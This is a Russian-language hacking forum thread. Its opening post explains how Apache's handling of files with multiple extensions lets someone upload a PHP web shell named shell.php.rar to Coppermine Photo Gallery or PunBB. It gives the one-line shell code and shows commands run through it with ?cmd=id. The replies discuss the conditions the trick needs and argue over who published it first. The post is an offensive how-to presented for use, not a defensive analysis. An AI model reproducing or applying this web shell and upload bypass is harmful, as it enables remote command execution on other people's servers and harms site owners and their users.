|
Манипуляция с именами файлов или закачиваем шелл на сервер вполне легальным образом.
В самом популярном веб сервере Apache есть такая фишка цитирую с официальной документации:
_____________________________________________ Files with Multiple Extensions Files can have more than one extension, and the order of the extensions is normally irrelevant. For example, if the file welcome.html.fr maps onto content type text/html and language French then the file welcome.fr.html will map onto exactly the same information. If more than one extension is given which maps onto the same type of meta-information, then the one to the right will be used, except for languages and content encodings. For example, if .gif maps to the MIME-type image/gif and .html maps to the MIME-type text/html, then the file welcome.gif.html will be associated with the MIME-type text/html. Languages and content encodings are treated accumulative, because one can assign more than one language or encoding to a particular resource. For example, the file welcome.html.en.de will be delivered with Content-Language: en, de and Content-Type: text/html. Care should be taken when a file with multiple extensions gets associated with both a MIME-type and a handler. This will usually result in the request being by the module associated with the handler. For example, if the .imap extension is mapped to the handler "imap-file" (from mod_imap) and the .html extension is mapped to the MIME-type "text/html", then the file world.imap.html will be associated with both the "imap-file" handler and "text/html" MIME-type. When it is processed, the "imap-file" handler will be used, and so it will be treated as a mod_imap imagemap file. ________________________________ Конец цитаты. Ссылка на данный мануал http://httpd.apache.org/docs/1.3/mod/mod_mime.html. Переводить не буду кому надо тот поймет. Вообщем благодаря этому мы можем зделать поддельный файл который будет работать так как нам надо. Возьмем к примеру скрипт фотогаллереи Coppermine photo gallery. Так вот там есть возможность закачать свой архив (.rar) тоесть по умолчанию этот тип разширения не записан в myme.types. Проверка в скрипте осушевствляеться только по разширению. Берем файл со следуещим содержимым <?php @system($_GET['cmd']);?> Задаем ему имя shell.php.rar тоесть разширение у нас правильное и закачиваем в этой галлереи этот самый файл. Далее обращаемся к нему по абсолютному УРЛ http://[site path]/shell.php.rar и наш файл работает как php вот мы и получили шелл на сервере. http://[site path]/shell.php.rar?cmd=id и команда успешно выполниться. Вот в принцепи и все. Затронутые продукты найденные на данный момент PunBB , Coppermine photo gallery. Автор статьи и подобной уязвимости я.Тоесть Grinay. Не забываем про репутацию. |
Фишка старая...Еще в ,по-мойму ,"][akepe" писали... оч давно...
Хотя я не пробовал этот метод... |
TO grinay:
Скажи пожалйста в каких условиях такая фишка работает?... т.е. нам надо 1)Apache 2)незарегистрированное расширение в Apache (типа rar) 3)и имя файла типа file.php.(любое незареганное расширение) я правльно понял?... |
Да ты правильно понял.. На счет журнала хакер возможно что она туда попала от ачата так как эту статью я в привате выкладывал месяца 4 назад. А если и раньше того я не видел. Найди статью в журнале и покажи.. Я скажу толи это вообще.
|
Цитата:
Тебе нужно 1) Веб сервер на удаленной тачке =) Любой, не обязательно Apache 2) Поддержка php на этом же серваке 3) Сконфигурирован сервер должен быть так, чтобы при обращении к незарегистрированному типу файла, запрос интерпритировался php. Так сконфигурено большенство серваков. Спасибо ЧПУ, которым так все болеют 4) файл с любым именем (не обязательно file.php., хватит и просто file.) и расширением как раз того незарегистрированного типа данных. Т.е. пойдет даже file.ass, лишь бы веб-сервер интерпритировал это как php запрос и отдавал его, собственно, php |
http://www.xakep.ru/magazine/xa/076/068/1.asp - в этой статье была использована подобная фишка
|
Фишка очень старая и нигде не встречаеться уже. Тем более причем тут НАШИ СТАТЬИ если этой статье уже, смело могу сказать, пол года минимум. Просто написал своими словами
|
| Время: 19:05 |